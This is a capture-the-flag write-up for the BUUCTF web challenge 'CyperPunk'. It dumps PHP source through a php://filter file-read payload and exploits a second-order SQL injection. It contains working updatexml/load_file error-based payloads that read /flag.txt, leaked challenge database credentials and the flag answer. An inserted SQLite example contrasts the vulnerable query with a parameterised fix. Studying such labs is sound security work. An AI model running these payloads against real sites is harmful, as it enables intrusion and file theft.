BUUCTF WEB CyperPunk
Time: 2023-09-18 06:37:01
Open the challenge, view the page source, and find the hint.
So the idea is a file-read vulnerability.
Try ?file=php://filter/convert.base64-encode/resource=index.php
It is echoed back successfully (as a base64 string).
Base64-decode it. The decoded output is index.php; the visible page has the title "index", the headline "2077 is on sale, want the physical collector's edition?" and a "Submit order" form.
Note the ini_set('open_basedir', '/var/www/html/'); line, which means directory traversal is not possible on this site. The form on the page points to confirm.php, so download and decode that too:
        query($sql);
    }
    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>
(The rest of the file is the "Confirm order" HTML page.)
You can see that the keywords this page filters include select, update and so on, which immediately points towards SQL injection; take a quick look first. It references config.php, so download and decode that as well:
                  "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname"   => "ctfusers"
);
$db = new mysqli($DATABASE['host'], $DATABASE['username'], $DATABASE['password'], $DATABASE['dbname']);
Analysing the insert in confirm.php afterwards shows that it uses a prepared statement, so there is no injection point there. But index.php links to other pages, so keep going.
change.php
        query($sql);
    }
    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>
(The rest of the file is the "Change shipping address" HTML page, which echoes $msg.)
This is where the problem is:
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
The new address has its single quotes escaped, but old_address and user_id are whatever the database stored back in the insert stage. There, because of the prepared statement, special characters such as single quotes are neutralised during the insert, yet the value that ends up stored in the database contains the plain single quote again.
On top of that, confirm.php applies no keyword filtering to address at all.
Put together, this forms a second-order (stored) SQL injection.
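To make the mechanism concrete, here is an added example (not the challenge's own code) that replays the two steps against an in-memory SQLite table: the address is stored through a bound parameter, then read back and concatenated into the UPDATE the way change.php does, beside an UPDATE that binds every value. The table layout, the sample user and the quote-doubling used in place of addslashes() are assumptions; a benign address containing an apostrophe is enough to show the stored value re-entering the SQL text.

```python
import sqlite3

# Constructed example, not the challenge's own code: confirm.php's parameterised INSERT
# followed by change.php's string-built UPDATE, on SQLite, then the UPDATE done safely.
SCHEMA = """CREATE TABLE user (user_id INTEGER PRIMARY KEY AUTOINCREMENT,
            user_name TEXT, phone TEXT, address TEXT, old_address TEXT)"""

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db

def place_order(db, user_name, phone, address):
    """confirm.php step: a bound parameter stores the address verbatim, quote included."""
    db.execute("INSERT INTO user (user_name, phone, address) VALUES (?, ?, ?)",
               (user_name, phone, address))

def find_order(db, user_name, phone):
    return db.execute("SELECT user_id, address FROM user WHERE user_name=? AND phone=?",
                      (user_name, phone)).fetchone()

def change_address_vulnerable(db, user_name, phone, new_address):
    """change.php as written: only the fresh input is escaped; the address read back
    from the table is spliced into the SQL text unescaped (second-order injection)."""
    user_id, old_address = find_order(db, user_name, phone)
    escaped_new = new_address.replace("'", "''")  # SQLite stand-in for addslashes()
    sql = ("UPDATE user SET address='" + escaped_new + "', old_address='"
           + old_address + "' WHERE user_id=" + str(user_id))
    db.execute(sql)
    return sql

def change_address_fixed(db, user_name, phone, new_address):
    """Hardened form: every value, including the one read back, is a bound parameter."""
    user_id, old_address = find_order(db, user_name, phone)
    db.execute("UPDATE user SET address=?, old_address=? WHERE user_id=?",
               (new_address, old_address, user_id))
    return db.execute("SELECT address, old_address FROM user WHERE user_id=?",
                      (user_id,)).fetchone()

def demo(stored_address="O'Brien's flat", new_address="12 Night City Ave"):
    """Returns (did the vulnerable UPDATE break?, (address, old_address) after the fix)."""
    db = fresh_db()
    place_order(db, "v", "1234", stored_address)
    try:
        change_address_vulnerable(db, "v", "1234", new_address)
        broke = False
    except sqlite3.OperationalError:  # the stored apostrophe ended the literal early
        broke = True
    db = fresh_db()
    place_order(db, "v", "1234", stored_address)
    return broke, change_address_fixed(db, "v", "1234", new_address)
```

With the apostrophe address the string-built UPDATE is a syntax error (in MySQL the same spot is where the writeup's payload takes over the statement), while the bound-parameter version stores both values intact.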
Inject the payload in the address field of the original page:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,50)),0x7e),1)#
On the change page enter anything; the error-based injection succeeds.
Just read the flag twice.
First read: flag{3b97108b-7cd8-4ef6-aa38-b
Second read: b0c9fddd7376}
Concatenated: flag{3b97108b-7cd8-4ef6-aa38-b0c9fddd7376}
Reference video: https://www.bilibili.com/video/bv1o34y1b7SH